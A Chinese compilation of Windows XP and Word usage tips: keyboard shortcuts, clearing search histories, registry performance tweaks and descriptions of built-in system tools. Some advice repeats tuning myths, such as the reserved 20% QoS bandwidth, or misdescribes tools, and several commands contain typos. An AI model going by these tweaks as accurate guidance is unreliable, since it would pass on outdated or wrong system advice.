◎硬件常见问题集锦(2)
◎硬件常见问题集锦(3)
◎硬件常见问题集锦（1）
◎硬盘升级要注意的几个问题
◎域 名 知 识
◎在BIOS中设置开机密码
◎在Windows XP中查找加密文件
◎整理了七个小时的东东
◎主板基础知识
◎主频、外频和倍频的区别是什么
◎注意湿度对电脑的影响

www.163164.com 下载:《一键清理系统垃圾》程序，保持系统的“苗条”身材与运行速度！

返回总目录


“Shift”键在Word中的妙用

《一键清理系统垃圾》

返回总目录 目录页 下一页

“Shift”键在Word中的妙用

《中国电脑教育报》徐海霞

    在Word中，我们常常要同时建立或打开多个文档文件进行编辑操作，所以退出Word时，往往要重复多次对文档的保存、关闭，既麻烦又浪费时间。而利用“Shift”键则可同时完成对多个文档的操作。

    按住“Shift”键，再打开“文件”菜单，则下拉菜单中的“保存”命令变为“全部保存”；原“关闭”命令变为“全部关闭”，单击其中的命令就可执行相应功能；若按住“Shift”键，再单击“文件”菜单中的“退出”命令，则会关闭所有打开的文件，并退出Word。


“擦除”搜索记录痕迹的五种技巧

《一键清理系统垃圾》

“擦除”搜索记录痕迹的五种技巧

    我们在执行搜索操作后，大多都会留下记录。而出于保护隐私的考虑，很多朋友都希望将曾经的搜索记录抹去痕迹。下面，我们将分别针对各个应用程序，介绍其清除之法。

    一、“擦除”eMule搜索记录

    使用eMule或eMule Plus的用户，若要清除搜索记录，先关闭程序，再在资源管理器中进入“X:\Program Files\eMule\Config”文件夹，找到“AC_SearchStrings.dat”文件，用文本编辑工具打开，删除其中的内容，如图1所示，保存修改，关闭文件。当重新启动程序后，就会发现搜索记录已全部消失了。

    二、“擦除”Maxthon搜索记录

    在Maxthon中，若要立即清除所有浏览记录，点击菜单栏“工具→清除浏览记录→清除搜索栏历史”即可。如果要使程序在退出时自动清除搜索记录，则点击菜单栏“选项→Maxthon选项”，在弹出窗口选择左侧视图中的“常规”，再在右侧视图中切换到“退出”标签页，在此勾选“清除搜索栏历史”复选框并确认操作。

    三、“擦除”Windows Media Player媒体库搜索记录

    在Windows Media Player中曾搜索过的多媒体文件，当再次输入开头一样的文件名时，程序会自动显示完整文件名，类似于IE的自动完成功能。若要彻底清除往日的“记忆”，点击菜单栏“工具→选项”，在弹出窗口中切换到“隐私”标签页，在此点击“清除历史记录”按钮即可。

    四、“擦除”Mozilla Firefox搜索记录

    我们点击程序菜单栏上的“工具→选项”，在弹出窗口中点击“隐私”按钮，再查看右侧视图，展开“保存表单信息”选项，如图2所示，点击“清空”按钮可立即清除搜索栏中的记录。若要一劳永逸，以后不再保存此类信息，则去除“保存我在网页表单和搜索栏中填写的信息”复选框中的对号。

    五、“擦除”Windows搜索记录

    我们Windows XP系统为例，运行注册表，定位于“HKEY_USERS\S-1-5-21-2052111302-329068152-682003330-500\Software\Microsoft\Search Assistant\ACMru\5603”，在其右侧视图中显示的就是我们以往用过的搜索关键字，选择删除相应键值。

    编辑提示：在注册表中定位于“HKEY＿CURRENT＿USER\Software\Microsoft\Search Assistant\ACMru\5603”，删除右侧视图中的搜索记录相关键值，也可达到同样效果。

作者：飘零雪
来源：中国电脑教育报


【Windows】攻略大全

《一键清理系统垃圾》

【Windows】攻略大全

Alt键使用十二招
1、激活*作命令：按下Alt键可以激活活动窗口的菜单栏，使菜单栏的第一个菜单成为高亮条，而按下Alt键和一个字母就可以激活这个字母所代表的菜单项，如按下Alt＋F就可以激活当前窗口的“文件（File）”菜单。此外，在对话框中，同时按下Alt键和带下划线的字母则可以选定该选项并执行相应的操作。
    2、终止某一进程：按下Ctrl＋Alt＋Del组合键即可弹出一个“关闭程序”对话框，选取某一进程，然后点击“结束任务”即可快速终止该进程。而再次按下Ctrl＋Alt＋Del组合键则可重新启动计算机。
    3、 弹出下拉列表：在对话框中，可以通过Alt＋向下箭头键来弹出所选的下拉列表，以免去移动鼠标寻找并点击列表框下箭头按钮之苦。
    4、快速查看属性：按下Alt＋Enter组合键或在按住Alt键的同时鼠标左键双击某对象（如资源管理器右边窗口中的文件夹、文件、桌面上的图标等，左边窗口中的文件夹不行），则可快速打开其“属性”对话框。其作用相当于点鼠标右键，并选取“属性”。
    5、切换DOS窗口：按下Alt＋Enter组合键可以在窗口和全屏幕方式下切换 MS－DOS。
    6、 万能抓图热键：在运行游戏或其它应用软件中，当屏幕上出现精美的画面时按下Alt＋PrintScreen组合键，就可以把当前活动窗口或对话框的内容拷贝至剪贴板，然后调用“画笔”或其它绘图程序，选取“编辑”菜单中的“粘贴”项，即可调出一幅漂亮的画面来。
    7、关闭应用程序：按下Alt＋F4键可以最快的方式关闭任何应用程序，而不用在文件菜单或工具条中寻找并单击“退出”或“关闭”。
    8、切换应用程序：按住Alt键不放，再连续按下Tab键则可以在一个对话框中显示出当前已经运行的所有程序的图标和当前激活的程序的图标及其名称，只要释放Alt键便可以立刻切换到该应用程序中，称之为“冷切换”。
    9、打开控制选单：在应用程序中，按下Alt＋空格键可以直接打开系统控制选单。
    10、 撤消上步操作：在Windows 98的各个对话框中，凡是对编辑框的*作都可以通过Alt＋Backspace键来撤消，其效果和Ctrl＋Z完全一样。该功能同样适用于微软的各字处理软件，如记事本、书写器、WORD等。另外，也可用该组合键来撤消文件移动或重命名等文件*作。
    11、切换辅助选项：对需要使用辅助选项快捷键的特定用户来说，Alt键同样可以助一臂之力。比如，按下左Alt＋左Shift＋Print Sscreen键可切换高对比度开关；按下左Alt ＋左Shift ＋ Num Lock 键可切换鼠标键开关。
    12、在Word中：选择文本时，如果先按下Alt键再拖动鼠标，则为列选择方式（否则为行选择方式）；在拖动标尺或表格线时，无法看出其准确的数据，但如果先按下Alt键再拖动或点击，则可获得精确的数据。

全面提速Windows XP

Windows XP现在已经相当普及了，在使用它的过程中，你是否感觉在速度上很多地方还没有Windows 9x系统快呢？比如访问网上邻居、开机关机等，下面我们就来逐个提升它们的速度。

    1、加速网上邻居

    在Windows XP中访问网上邻居是相当恼人的，系统会搜索自己的共享目录和可作为网络共享的打印机以及计划任务中和网络相关的计划任务，然后才显示出来，显然这样速度就会比Windows 9x中慢很多。其实这些功能我们并没有使用上，与其不用还不如删除它们，这样速度就会明显加快。打开注册表编辑器，找到 HKEY_LOCAL_MACHINE/sofeware/Microsoft/Windows/ Current Version/Explore/RemoteComputer/NameSpace，删除其下的{2227A280-3AEA-1069-A2DE08002B30309D}（打印机）和{D6277990-4C6A-11CF8D87- 00AA0060F5BF}（计划任务），重新启动电脑，再次访问网上邻居，你会发现快了很多。

    2、减少开机滚动条时间

    每次启动Windows XP，蓝色的滚动条都要走上好多次，其实这里我们也可以把它的滚动时间减少，以加快启动速度。打开注册表编辑器，找到HKEY_LOCAL_MACHINESYSTEM\CurrentControlSet\Control\Session Manager\Memory ManagementPrefetchParameters，在右边找到EnablePrefetcher主键，把它的默认值3改为1，这样滚动条滚动的时间就会减少。

    3、加快开机速度

    在XP中关机时，系统会发送消息到运行程序和远程服务器，告诉它们系统要关闭，并等待接到回应后系统才开始关机。加快开机速度，可以先设置自动结束任务，首先找到HKEY_CURRENT_USER\Control Panel\Desktop，把AutoEndTasks的键值设置为1；然后在该分支下有个“HungAppTimeout”，把它的值改为“4000（或更少），默认为50000；最后再找到HKEY_LOCAL_MACHINE\ System\CurrentControlSetControl\，同样把WaitToKillServiceTimeout设置为“4000”；通过这样设置关机速度明显快了不少。

    4、去掉菜单延迟

    为了达到视觉上的真实感，Windows XP中的菜单在打开时会有滑出的效果，但这也会延缓打开速度。我们可以在HKEY_CURRENT_USER\Control Panel\Desktop下找到“MenuShowDelay”主键，把它的值改为“0”就可以去掉菜单延迟效果。

    5、提高宽带速度

    专业版的Windows XP默认保留了20%的带宽，其实这对于我们个人用户来说是没有什么作用的。尤其让它闲着还不如充分地利用起来。

    在“开始→运行”中输入gpedit.msc，打开组策略编辑器。找到“计算机配置→管理模板→网络→QoS数据包调度程序”，选择右边的“限制可保留带宽”，选择“属性”打开限制可保留带宽属性对话框，选择“禁用”即可。这样就释放了保留的带宽，对于上网的朋友是非常有用的。

XP中的一些小东西

1.免费的系统教程（system32文件夹下）
    安装完Windows XP后很想马上学习并体验一下它的魅力吗？我们无需再东奔西走去找烦人的文字教材。只要选择“开始”→“漫游Windows XP”，就会出现界面，它将引导我们游历Windows XP的新功能。
    小提示：Windows XP中自带的教程非常形象，是图形界面的，而且制作得相当精美，微软的权威性可想而知。如果你的“开始”菜单上没有“漫游Windows XP”项目，则可以运行C:＼Windows＼System32＼tourstart.exe进入。

2.辅助功能向导——Accwiz（system32文件夹下）
    我们知道，微软在Windows中为残疾人士提供了辅助功能，使他们也能xx作计算机。该程序可以根据用户的视觉、听力和行动来配置我们的Windows，使残疾人士能根据自身情况更好地使用Windows。

3.字符映射表——Charmap（system32文件夹）
    是不是觉得Word的“插入符号”功能非常方便？我们在其他Windows程序中也常常要插入一些特殊符号，而一个个地找又麻烦，这时可使用“字符映射表”程序帮忙。通过“字符映射表”可查看选定字体中有哪些字符，选中后单击“选定”和“复制”按钮，即可把选定字符复制到Windows剪贴板中，供字处理软件粘贴使用。
    小提示：用它来复制特殊字体中的特殊符号特别有用。

4.仓颉拼音输入法——CINTSETP(system32＼IME＼Cintlgnt文件夹下)
    微软新仓颉输入法98b的安装程序，微软把它放在简体中文版Windows XP中，但埋藏得较深。不过它很有用，安装后就会在Windows中新增一个“中文（台湾）”的仓颉输入法，利用它可以在简体中文Windows XP上通过输入繁体汉字。这对于从中国港澳台地区至内地工作的人提供了方便。

5.磁盘清理大师——Cleanmgr（system32文件夹下）
    尽管现在的硬盘越来越大，但它总有容量的限制。在你不经意地安装这个或那个软件的过程中，可能会因为硬盘空间已频频告急而影响了正常Windows程序的执行。不要急，请打开此程序，它会自动地释放出一部分硬盘空间，并会智能化地进行删除xx作，保证你的系统万无一失。这比从资源管理器中删除要安全多了。

6.剪贴板查看器——Clipbrd（system32文件夹下）
    Windows剪贴板为我们在各个Windows程序间的信息交流提供了一个桥梁。但这部分数据一般情况下无法看到。不过，使用剪贴板查看器就可看到当前剪贴板中的“新大陆”。Windows XP中的剪贴板查看器程序较原先Windows 9X/Me的旧版本多出了共享功能，通过设置权限允许其他网上用户将该剪贴板装入使用。

7.控制面板启动器——Control.exe（system32文件夹下）
    控制面板是Windows的一个重要组成部分，许多设置都通过他完成。而双击这个文件就是最快打开系统控制面板的方法，可省去从“开始”菜单上层层点击的麻烦。

8.Windows XP的诊断医生——Drwtsn32（system32文件夹下）
    Drwtsn32是一个程序错误调试器。DrWatson程序会获得并记录运行Windows的计算机上的程序错误的信息。只要检测到错误，就会创建一个文本文件 (Drwtsn32.log)，提供错误原因的详细说明，并给出解决问题的建议性xx作，在与Microsoft技术支持联系并请求帮助时，Drwatson将会起到很大作用。

9.DVD播放器——DVDplay（system32文件夹下）
    随着DVD驱动器和DVD光盘价格的下降，在普通家庭电脑上配置一个DVD播放器已不是一件奢侈的事情。而要播放DVD需要播放器的支持，Windows XP提供了一个“免费”的DVD播放器，有了它我们可以省去一笔购买第三方DVD播放软件的费用。

10.自解压文件制作工具——Iexpress（system32文件夹下）
    用过压缩软件的读者一定对自解压文件不陌生，自解压文件可在没有相应解压缩程序的情况下直接将压缩包文件解压缩到相应的文件夹下，极大地方便了用户。利用Iexpress可制作两种自解压文件，一种是标准自解压文件（Standard Self-Extractor），另一种是安装程序式自解压文件（Self-Extractor for Software Installation），这样我们在发布程序时就方便多了。另外大家要注意，尽管使用Iexpress的运行界面是英文的，但利用它生成的自解压文件却是中文的，省去了繁琐的本地化工作。

11.文件转移向导——Migwiz（system32＼usmt文件夹下）
    Windows系统的易用性总是和不稳定性共存的，因此在系统健康之时把当前设置保存下来，供系统崩溃后重新安装时使用是个不错的主意。微软已把这个工具集成到“文件和设置转移向导”程序上。通过它，我们就可以实现系统状态的备份与恢复。

12.系统配置程序——Msconfig（Windows＼PChealth＼HELPCTR＼Binaries文件夹下）
    和Windows中的系统配置程序一样，通过这个程序，我们可对系统的一般、SYSTEM.ini、WIN.ini、BOOT.ini、服务和启动项目进行修改。
小提示：用它来去除系统自启动程序特别有效。

13.备份工具——Ntbackup（system32文件夹下）
    数据是计算机中最为宝贵的资料，因此经常备份你的资料也应该成为一个好习惯。现在许多人都寻求第三方的备份工具，其实大可不必。使用Windows XP中内置的备份工具就可以非常方便地将资料进行备份，而且由于你使用的是微软产品，所以根本不存在兼容性问题。

14.ODBC数据源管理器——Odbcad32（system32文件夹下）

    在Windows中访问ODBC数据源必须要有其驱动程序，该工具可以查看在Windows中已安装的驱动程序及相关信息。

15.IP地址侦测器——Nslookup（system32文件夹下）
    在联入互联网的每台电脑都有一个IP地址，同样，每个网站也有它的IP地址，而且是唯一的。通过这个IP侦测工具ping就可以轻而易举地得到它们的真正IP地址。如笔者要想知道http://www.xxx.com的IP地址，...S窗口下输入ping http://www.xxx.com即可看到。

16.屏幕键盘——Osk（system32文件夹下）
    屏幕键盘是一种实用工具，它在屏幕上显示虚拟键盘，允许那些有移动障碍的用户用指针设备或游戏杆输入数据。屏幕键盘旨在为存在移动障碍的用户提供最低级别的功能。这对于不知道如何键入的用户也很有用。它还可以用于最基本的CAI键盘教学。

17.对象包装程序——Packager（system32文件夹下）
    通过对象包装程序我们可以打开一个文件，并引入其中的图标，将它们插入到一般Windows程序中使用，可用于制作计算机类教学课件或文档。

18.注册表编辑器增强版——Regedit32（system32文件夹下）
    注册表编辑器是用来更改系统注册表设置的高级工具。注册表中包含了有关计算机如何运行的信息。在Windows XP中有一个名为Regedit的程序，可编辑注册表，但此程序却是它的增强版本，除可编辑注册表外，还可设置权限、清除重复项、删除已被卸载或删除的程序项等高级xx作。

19.ActiveX注册和反注册工具——Regsvr32
    使用过ActiveX的人都知道，ActiveX不注册是不能够被系统识别和使用的，一般安装程序都会自动地把它所使用的ActiveX控件注册，但如果你拿到的一个控件需要手动注册怎么办呢？如果修改注册表那就太麻烦了，在Windows的System文件夹下有一个regsvr32.exe的程序，它就是Windows自带的ActiveX注册和反注册工具。它的用法为：
    “regsvr32 [/s] [/n] [/i(:cmdline)] dllname”。其中dllname为ActiveX控件文件名，建议在安装前拷贝到System文件夹下。
    参数有如下意义：
    /u——反注册控件
    /s——不管注册成功与否，均不显示提示框
    /c——控制台输出
    /i——跳过控件的选项进行安装（与注册不同）
    /n——不注册控件，此选项必须与/i选项一起使用
    如笔者要注册一amovie.ocx控件，则打入regsvr32 amovie.ocx即可，要反注册它时只需使用
regsvr32 /u amovie.ocx就行了。

20.动态链接库函数启动器——Rundll32
    在Windows中使用了许多动态链接库，这样就使得所有Windows程序都可共享这些动态链接库中的函数。一般情况下，许多应用程序都通过Windows API来xx作这些函数，但归根结底是通过Windows文件夹下的rundll32.exe程序来启动相应的函数。它的用法是：“rundll32.exe 动态链接库名,函数名,参数名”。如笔者需要实现一键关机，则在桌面上建立一快捷方式，命令行为“rundll32.exe user.exe,ExitWindows”，并设置其快捷键为F4即可。再如，笔者要打开控制面板，则只需要输入命令“rundll32.exe shell32.dll,Control_RunDLL”即可，要打开桌面属性，只需要使用“rundll32.exe shell32.dll,Control_RunDLL desk.cpl”，其余的以此类推。

21.系统文件检查器——Sfc（system32文件夹下）
    使用Windows难免不会出现系统文件损坏或丢失的毛病，而如果为了几个小小的文件就去重装系统，又显得稍微麻烦了一些。通过系统文件检查器Sfc.exe，一切都会变得非常简单。

22.共享文件夹设置工具——Shrpubw（system32文件夹下）
    同一工作组的同事在一起工作，有时必须与同事们共享文件夹，这时我们可以利用此工具轻松搞定。它的作用与右击一文件夹，选择“共享”基本上等价。

23.Microsoft 签字验证工具——Sigverif（system32文件夹下）
    所谓“签署的文件”，就是被授予Microsoft数字签署的文件。该签署表明，该文件是原始文件的一模一样的副本。通过Microsoft签字验证工具，我们可在计算机上查找已签署和未签署的文件，也可查看签署文件的身份验证，以确认该文件还没有被篡改。使用起来非常方便，和查找窗口几乎没有什么不同，只要给出搜索范围，就可搜索出指定范围内的已签署文件和未签署文件。

24.音量控制程序——Sndvol32
    我们在Windows任务栏上可见到一个可爱的小喇叭，当我们双击它时就会弹出音量控制面板，其实这时我们就是启动了一个Windows文件夹下的sndvol32.exe文件。不信，请你进入Windows文件夹，再打开sndvol32.exe文件看看，熟悉的“音量控制”面板是否已经在你眼前了？另外还要告诉大家，它还有一个隐藏的参数“/r”，利用此参数可快速地打开录音控制面板，这样我们只要在桌面上建立一指向C:＼Windows＼Sndvol32.exe的快捷方式，并令它的参数为/R（即在目标中填入“C:＼Windows＼Sndvol32.exe /R”），就可以快速打开录音控制面板选择输入设备了。如果设备过多，在面板上容纳不下时，试着按“Ctrl+S”键，不管有多少设备都能够完全显示。

25.任务管理器——Taskmgr（system32文件夹下）
    任务管理器提供正在你的计算机上运行的程序和进程的相关信息，使用任务管理器可快速查看正在运行的程序的状态，或终止已停止响应的程序。也可使用多达15个的参数评估正在运行的进程的活动，以及查看CPU和内存使用情况的图形和数据。当计算机发生锁死时使用它最方便和有效。

26.远程连接程序——Telnet（system32文件夹下）
    在Internet上有无数的计算机，而要访问它们都必须通过建立远程连接才行，进行两个计算机的远程连接可用专门软件实现，但通过Windows自带的远程连接程序telnet.exe也能完成这一xx作，而且它还是纯中文界面软件。

27.远程FTP工具——Tftp（system32文件夹下）
    FTP是一个网络传输的协议，通过这个程序可非常方便地连接到对方的服务器上进行文件的存取xx作，省得再找如第三方的FTP软件了，可惜的是它是字符界面。

28.Windows升级程序——Wupdmgr（system32文件夹下）
    安装完Windows后，在开始菜单的上方会有Windows Update菜单项，通过它能自动登录到Microsoft公司的网站上完成自己Windows的升级工作。但时间一长，可能会把这个快捷方式误删除了，这时我们就可以通过打开Windows下的Wupdmgr.exe文件来完成这个功能。

    Windows XP是一个操作系统，但它并不仅仅是一个操作系统，只有充分地发挥其内置功能，才能更好地使用它。这也符合“基础的未必是最坏的，回到基础还是好的”的道理。

XP提升性能小技巧

一、取消解压缩功能
Windows XP可以自己解开Zip压缩文件，但你是不是更钟爱Winzip、WinRAR呢﹖那就把Windows XP默认的解压缩功能取消吧!按下“开始”→“运行”，输入“regsvr32 /u zipfldr.dll”，然后确定。接下来会弹出一个窗口，按确定，这样Windows XP的解压缩功能就被取消了。

二、去掉磁盘扫描的等待时间
当Windows XP非正常关机时，重新开机需要等待10秒才会开始磁盘扫描。如果你觉得这10秒钟太长，那就干脆让它变成0秒吧!按下“开始”→“所有程序”→“附件”→“命令提示符”，在提示符下键入“CHKNTFS /T0”然后回车，这样下次就不用等待那漫长的10秒了。

三、加快下载速度
Windows XP在默认情况下，保留了20%的连接带宽给支持QoS的程序，但是，大部分程序都不支持QoS服务，也不是所有的设备都提供QoS封包分流管理。因此，释放这预留的20%的带宽，可以使下载速度提高不少。按下“开始”→“运行”，输入“gpedit.msc”，弹出组策略窗口，在窗口的左边依次点选“计算机配置”→“管理模块”→“网络”→“QoS数据包调度程序”，在右边的“限制可保留带宽”上点右键，选择属性，在弹出窗口的“设置”选项卡下选“已启用”，将“带宽限制”改为0%。

四、释放系统备份所占用的空间
Windows XP在安装完毕后会自动备份一些重要的系统文件，如果你想把这些空间腾出来，那好，按下“开始”→“运行”，输入“sfc /purgecache” ，然后确定，稍等片刻，你会发现硬盘空间又多出不少!

五、删除预读文件以提升系统效能
Windows XP有个专门储存安装过的软件的预读文件的文件夹，以便预先读取以加快软件运行速度，但Windows XP并不会自动将已卸载软件的预读文件删除，所以只有手动来删除了。进入“XWindowsPrefetch”（X表示Windows XP所在的分区）文件夹，删除除了“Layout.ini”以外的
所有文件。

六、全方位地了解你的计算机
想不想全面地了解你的计算机的软硬件信息和使用状况呢?Windows XP已经带有强大的系统信息收集程序。按下“开始”→“帮助和支持”，弹出“帮助和支持中心”窗口，在右边选择“使用工具查看您的计算机信息并分析问题”，然后在左边的列表中选择“我的计算机信息”，好了，你可以在右边选择你想知道的信息了（比用Msinfo32.exe得到的系统信息要直观得多! 。

七、瞬间锁定计算机

突然有事要离开片刻，但又不想关机，为了不让别人动你的电脑，你只需要按下Windows徽标键+L，即可快速锁定计算机，除非知道密码，谁也别想动!

八、修改cpu的二级缓存

在正常情况下，xp会自动识别cpu的二级缓存。但有时xp不会这样做，这样就需要手动优化以改善cpu的性能。
1.运行"regedit";

2.去"[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory
Management\SecondLevelDataCache]";

3. 修改他的十进制: 　　AMD Duron: 64(kb); 　　CeleronA/celeron2:128; 　　PII mobile/
PIII E(EB)/P4/AMD K6-3/AMD THUNDERBird/Cyrix III:256; 　　AMD K6-2/PII/PIII katmai/
AMD Athlon:512; 　　PII Xeon/PIII Xeon:1024;

4.重启。

九、修改磁盘缓存以加速xp

磁盘缓存对xp运行起着至关重要的作用，但是默认的I/O页面文件比较保守。所以，对于不同的内存，采用不同的磁盘缓存是比较好的做法。
1.运行 "regedit";
2.去[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\IoPageLockLimit];
3.根据你的内存修改其十六进制值: 　　64M: 1000; 　　128M: 4000; 　　256M: 10000; 512M或更大: 40000

4.重启

十、预读设置以提高速度

xp使用预读设置这一新技术，以提高系统速度。如果你拥有PIII 800, 512M内存以上，推荐一下修改：
  1.运行“egedit”
2.去[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters\EnablePrefetcher];
3.设置数值0，1，2，3。0-Disable,1-预读应用程序,2-启动预读,3-前两者皆预读 ("3"，推荐
使用)。
4.重启。这样可以减少启动时间。

十一、清除预读文件

当xp使用一段时间后，预读文件夹里的文件会变的很大，里面会有死链文件，这会减慢系统时间。建议，定期删除这些文件。（c:\windows\prefetch）

十二、减少磁盘扫描等待时间
    在dos下，键入“chkntfs/t:0” 　　0：表示等待时间为0秒

十三、关闭磁盘索引
   Xp纪录了所有文件以便快速搜索，如果你不经常查找文件，可将它关闭。
1.打开我的电脑
2.右击驱动器，选“属性”。
3.取消“使用索引以便快速查找文件”。

十四、修正鼠标加速的bug
1.当在xp玩quake3、cs时，鼠标加速有问题而且枪法变得不准，名为“yinxs”的tweak能修改这个bug。
2.运行“regedit”
3.去[HKEY_CURRENT_USER\Control Panel\Mouse] "SmoothMouseXCurve"=hex:00,00,00,00,00,00,00,00,00,a0,00,00,00,00,00,00,00,40

,\ 01,00,00,00,00,00,00,80,02,00,00,00,00,00,00,00,05,00,00,00,00,00 "SmoothMouseYCurve"=hex:00,00,00,00,00,00,00,00,66,a6,02,

00,00,00,00,00,cd,4c,\ 05,00,00,00,00,00,a0,99,0a,00,00,00,00,00,38,33,15,00,00,00,00,00
4.重启

十五、优化ntfs文件系统
ntfs的好处不用说了吧，但也有不足。取消更新最后一次磁盘访问，这样对于容量大的分区，会减慢速度。
   运行“regedit” 在HKEY_LOCAL_MACHINE\SYSTEM\CurrentContolSet\Control\Filesystem)中，加DWORD，数值为1。

Windows实用操作技巧

1.如果同时有多个窗口打开，想要关闭的话，可以按住shift不放然后点击窗口右上角的关闭图标

2.在保存网页前，可以按一下"ESC"键(或脱机工作)再保存,这样保存很快

3.用电脑听CD可以不用任何播放软件，把音箱线直接接到光驱的耳机孔，放入CD，按光驱上的play键就可以直接听了，这样听歌可以不占用系统资源。（如果你的电脑坏了，不能启动或什么的，一时放在那不能修，千万不要浪费资源，把用里面的电源给光驱通上电，就可以暂时做CD机了

3.MSN中发消息的时候是按enter的，如果想要换行而不想发出消息，可以shift+enter或ctrl+enter

4.浏览器的地址栏里可以调试简短的HTML代码。方法如下： 地址栏写about:<font color="#0000ff">abc</font> 回车，就看到效果了

5.Windows快捷键：
win+m 显示桌面
win+pause 系统属性
快速重新启动:按确定前先按shift.
彻底删除:shift+del
不让光盘自动运行:按shift
Ctrl+Esc：相当于"开始"或WIN键
Ctrl+Home：将游标移至文字编辑区的开始始(Home单用：移至列首)
Ctrl+End：将光标移至文字编辑区的终点(End单用：移至列尾)
Alt+F4：关闭当前视窗（若是点一下桌面再按则为关机)
F2：更改名称
windows+e 资源管理器
windows+r 运行
windows+f 查找
windows+u 关闭系统
windows+d最小化所有窗口，再按一次Win+D可回到最小化前的窗口
windows+m最小化所有窗口，但再按一次无法回到最小化前的窗口
Shift+F10，可以打开所选项目的右键菜单
按住 CTRL+SHIFT 拖动文件:创建快捷方式

6.<关机快捷方式>
(1). 在桌面空白位置按鼠标右键 -> <新建> -> 选<快捷方式>
(2). 在<指令行>键入 rundll.exe user.exe,exitwindows
(3). 在<选择快捷方式 的名称>键入<关闭Window>或你想要的名称 -> 按<完成>
7.<重新启动快捷方式>
(1). 重复以上 (1)
(2). 在<指令行>键入 rundll.exe user.exe,exitwindow***ec
(3). 在<选择快捷方式的名称>键入<重新启动Restart>或你想要的名称 -> 按<完成>
8.RUN - > cmd 或者command
就会看到DOS窗口。不知道大家注意到那个小小的图标没有，在左上角。点击这个图标， 就会看到下拉菜单， 尤其是Edit下的一些功能， 很方便
10.con、nul是MS系统的保留名，它不能做为文件名！检查你的web空间是不是M$系统，可以建一个con的文件夹试试
11.想把自己的某个文件夹的文件做一个列表? 用什么软件呢? 不用,直接在命令行下输入 "tree /f > index.txt".打开index.txt看一下是不是一目了然
12.保存无边窗口页面请用CTRL+N新开窗口
13.如果一个文件夹下有很多文件，如果想快速找到想要的文件，先随便选择一个文件，然后在键盘上选择想要的文件的第一个字母就可以了
14.说个QQ隐身登陆的笨办法:
在网吧上网，如果直接从注册向导登陆的话QQ是上线登陆的，可是有时候却不希望现身，怎样实现隐身登陆呢？就是拿一个没用的QQ先从注册向导登陆了，选择状态为隐身，然后在系统参数中选中以隐身方式登陆，点确定，然后直接在这个QQ上运行注册向导登陆你要登陆的QQ，你会发
现现在QQ是隐身的了。
15.win98改ip不重启的办法：
1。改完ip选择取消。
2。在设备管理器里禁用改了ip的那块网卡。
3。启用网卡。
ok，你改的ip已经可以用了
16.2000和xp下运行"cmd"，进入dos窗口，复制和粘贴都用右键完成
17.收藏夹不要放在系统盘，以免忘了备份，每次装完系统用"超级魔法兔子“指定路径
18.对于系统不明白的地方，平时多看windows自带的帮助，不要盲目去找人解决，也许帮助才是最快和最全的。（其余软件也是同理）
19.winxp自带批量重命名功能，只要选中一堆文件，选重命名，然后改第一个文件，改完后，其他文件也会自动修改
20.上网时在地址栏内输入网址，系统会记录下来，虽然方便以后不用再重复，不过如果是公用的机子，又不想让别人知道自己到过哪些地方，可以用“CTRL＋O（字母O，不是0）”，这时对弹出一个“打开”对话框，在其中的地址栏内输入网址，就不会被记录下来了
21.IE快捷键：
Ctrl+W关闭窗口
F4打开地址拦的下拉选择网址
F6或ALT+D选择地址拦
空格键可以下翻页，Shift+空格则可以上翻页
22.如果你用foxmail，邮箱路径不在默认位置，可以修改account.cfg
23.NTFS分区上文件属性中有个“摘要”功能，很有用的，这样一些软件安装程序是什么东东就不会忘了啊
24.在IE的地址栏输入： javescript:alert(document.lastModified)可以得到网页的更新日期
25.通过网络共享时，尽量使用"运行"，\\ip地址\共享文件名，而不要使用通过“网上邻居”浏览访问，速度很慢，而且经常不全（特别是2000，xp)，还要注意适当的运用$
26.在98下快速做启动盘，只要把windows/command/edb下的所有文件复制到干净的软盘中就可以做98启动盘
27.运行pq分区失败，出现不可识别的分区，只要找到pq安装目录UTILITY的PTEDIT32.EXE，可以把原分区还原为原来格式打开资源管理器，选中文件夹，用小键盘的*,可以把这个文件夹中的所存在的所有子文件夹迅速列出
28.QQ自己加自己的方法：在黑名单中加自己，然后再把自己拖到我的好友中就可以了,然后再运行注册向导
29.如果浏览的页面中应用了javascript禁用了鼠标右键，解决的方法：
1、如“xiayupei”的方法，先按住鼠标左键，然后将鼠标移动到目标处，点击鼠标右键，一两秒之后，快捷菜单出现
2、单击鼠标右键，（不要放开鼠标右键），将鼠标移到警告窗口处，点击鼠标左键，关闭窗口，再将鼠标移回目标处，放开鼠标右键，快捷菜单出现
30.realplay多曲播放
选中多个曲目,然后拖到realplay 的播放地址栏就可以了,之后找到那个ram(会自动生成),复制里面的内容多遍就可以反复听歌曲
31.windows下文件可以只有扩展名
新建一个文本文档另存为.txt.前面什么也不要加，就可以了，但是你不能重命名为这样的文件名！要用另存为！
32.IE真正的空白页：
在IE的快捷方式中右击---属性--选择“目标”，这里的信息为：“c:\Program FilesInterner Explorer\EXPLORER.exe",在它之后添加“ -nohome"字样即可。注意-nohome之前要有空格
快速设置主页：将IE地址栏里的“e”网页图标直接拖到工具栏上的“主页”按钮图标上用重启也刷新注册表：同时按Ctrl+Alt+Del,在弹出的Windows任务列表中加亮"Explore",单击“结束任务”，显示关机屏幕，单击：“否“，稍候，弹出错误信息，单击“结束任务”，windows游览器即会和新和注册表一起重新装载
33.快速启动RealOnePlayer的技巧：在Real的文件夹下搜索netid.smi和getmedia.ini将其改名为：betid_bak.smi和getmedia_bak.ini，然后再打开试试,是不是快很多
34.跳过开机画面，启动时按 esc 即可，或者干脆一点，修改 msdos.sys在options段落加入logo=0
35.创建浏览目录的快捷方式
在桌面上创建一个快捷方式， 命令为：C: \WINDOWS\EXPLORER.EXE /n,/e,C:\当你双击此快捷方式时，将会用“Windows资源管理器”浏览C:\。当然，你可以用其他的目录名来替换命令中的C:\
36.改变关机画面:
记得以前可以改变开机画面吧　现在可以对关机画面动手喔　logow.sys 是等待关机logos.sys 是最後丑丑的 "您可以安全关机都是 bmp 档快动手吧原图是 320x400 , 256 色但是最後win95 会把他放宽 170%　所以你可以先准备一张 544x400 的图再把这张图 resize 成320x400　再 rename 一下档名就可以啦　（只能 256色喔　）而且最好注意一下色盘的问题*开机画面也可以喔　logo.sys....
